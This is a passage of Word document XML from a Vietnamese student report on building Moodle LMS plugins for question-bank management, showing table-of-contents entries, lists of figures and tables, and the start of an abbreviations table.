          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409069" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.1 Khái quát</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409069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2FF86494" w14:textId="48924E7B" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409070" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.2 Thiết kế và cài đặt các plugin hỗ trợ quản trị ngân hàng câu hỏi</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409070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67375323" w14:textId="051BA459" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409071" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.2.1</w:t>
        </w:r>
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> Các yêu cầu</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409071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507D4998" w14:textId="1ED99E0F" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409072" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.3 Kết chương</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409072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717D2AED" w14:textId="2FDF8980" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409073" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
            <w:noProof/>
          </w:rPr>
          <w:t>CHƯƠNG 3.</w:t>
        </w:r>
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> THỬ NGHIỆM VÀ ĐÁNH GIÁ</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409073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69E4B6B6" w14:textId="38135858" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409074" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.1 Triển khai và thử nghiệm trên hệ thống Moodle LMS cục bộ</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409074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064264A0" w14:textId="18AB5601" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409075" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.1.1</w:t>
        </w:r>
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> Triển khai trên hệ thống Moodle LMS cục bộ</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409075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3C1AEEF2" w14:textId="442AED8F" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409076" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.2 Kết chương</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409076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704D82D1" w14:textId="2A5BF21D" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409077" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>KẾT LUẬN</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409077 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="68A08203" w14:textId="089D9E71" w:rsidR="00354E72" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182409078" w:history="1">
        <w:r w:rsidR="00354E72" w:rsidRPr="00A173D7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>TÀI LIỆU THAM KHẢO</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182409078 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0411AA26" w14:textId="70A8911E" w:rsidR="00706FA7" w:rsidRPr="00AE47E8" w:rsidRDefault="00C17AAF" w:rsidP="006E1517">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B6119F" w14:textId="77777777" w:rsidR="00706FA7" w:rsidRPr="00AE47E8" w:rsidRDefault="00706FA7">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE47E8">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A71590" w14:textId="3AA10A40" w:rsidR="00BB2848" w:rsidRPr="00BB2848" w:rsidRDefault="00BB2848" w:rsidP="00BB2848">
      <w:pPr>
        <w:pStyle w:val="CTDT-H0"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc153572008"/>
      <w:bookmarkStart w:id="4" w:name="_Toc182409059"/>
      <w:r w:rsidRPr="00AE47E8">
        <w:lastRenderedPageBreak/>
        <w:t>DANH MỤC CÁC HÌNH VẼ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \f F \h \z \t "CTDT-Hinh" \c </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F2E2CB" w14:textId="41847D95" w:rsidR="00BB2848" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182297019" w:history="1">
        <w:r w:rsidR="00BB2848" w:rsidRPr="00CE6C35">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1</w:t>
        </w:r>
        <w:r w:rsidR="00BB2848" w:rsidRPr="00CE6C35">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> - Top 7 ưu điểm nổi bật của Moodle LMS</w:t>
        </w:r>
        <w:r w:rsidR="00BB2848">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00BB2848">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00BB2848">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182297019 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00BB2848">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00BB2848">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="00BB2848">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="35F36967" w14:textId="4E536312" w:rsidR="00BB2848" w:rsidRDefault="004458FF">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc182297020" w:history="1">
        <w:r w:rsidR="00BB2848" w:rsidRPr="00CE6C35">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 2</w:t>
        </w:r>
        <w:r w:rsidR="00BB2848" w:rsidRPr="00CE6C35">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> - Giao diện hệ thống Moodle LMS cục bộ</w:t>
        </w:r>
        <w:r w:rsidR="00BB2848">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00BB2848">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00BB2848">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182297020 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00BB2848">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00BB2848">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00BB2848">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AC5BD85" w14:textId="15D9CF54" w:rsidR="00706FA7" w:rsidRDefault="00BB2848" w:rsidP="00B9705E">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF37D37" w14:textId="77777777" w:rsidR="00B9705E" w:rsidRDefault="00B9705E" w:rsidP="00B9705E">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3992F3AC" w14:textId="77777777" w:rsidR="00B9705E" w:rsidRDefault="00B9705E" w:rsidP="00B9705E">
      <w:pPr>
        <w:pStyle w:val="CTDT-H0"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc153572007"/>
      <w:bookmarkStart w:id="6" w:name="_Toc182409060"/>
      <w:r w:rsidRPr="00AE47E8">
        <w:t>DANH MỤC CÁC BẢNG BIỂU</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="25130F21" w14:textId="4809AF66" w:rsidR="00B9705E" w:rsidRDefault="00B9705E">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9458"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="en-AU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \f E \h \z \t "CTDT-Bang" \c </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc182297113" w:history="1">
        <w:r w:rsidRPr="004E5870">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Bảng 1. Định dạng Aiken của file các câu hỏi trắc nghiệm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc182297113 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00354E72">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31C37F59" w14:textId="673829B2" w:rsidR="007B5F16" w:rsidRDefault="00B9705E" w:rsidP="00B9705E">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="482B1FF4" w14:textId="77777777" w:rsidR="007B5F16" w:rsidRDefault="007B5F16" w:rsidP="00B9705E">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA4BFCC" w14:textId="6BEF82E7" w:rsidR="00F24C64" w:rsidRPr="00AE47E8" w:rsidRDefault="00F24C64" w:rsidP="00F24C64">
      <w:pPr>
        <w:pStyle w:val="CTDT-H0"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc153572009"/>
      <w:bookmarkStart w:id="8" w:name="_Toc182409061"/>
      <w:bookmarkStart w:id="9" w:name="_Hlk92102585"/>
      <w:r w:rsidRPr="00AE47E8">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">DANH MỤC CÁC </w:t>
      </w:r>
      <w:r>
        <w:t>TỪ VIẾT TẮT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9180" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1123"/>
        <w:gridCol w:w="4088"/>
        <w:gridCol w:w="3969"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F24C64" w:rsidRPr="00A76C93" w14:paraId="33807E09" w14:textId="77777777" w:rsidTr="00C202B1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1123" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11E8F3CC" w14:textId="77777777" w:rsidR="00F24C64" w:rsidRPr="00A76C93" w:rsidRDefault="00F24C64" w:rsidP="00C202B1">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A76C93">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve">Từ </w:t>
            </w:r>
            <w:r w:rsidRPr="00A76C93">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:br/>
              <w:t>viết tắt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4088" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30DDA191" w14:textId="77777777" w:rsidR="00F24C64" w:rsidRPr="00A76C93" w:rsidRDefault="00F24C64" w:rsidP="00C202B1">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A76C93">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Thuật ngữ tiếng Anh/Giải thích</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
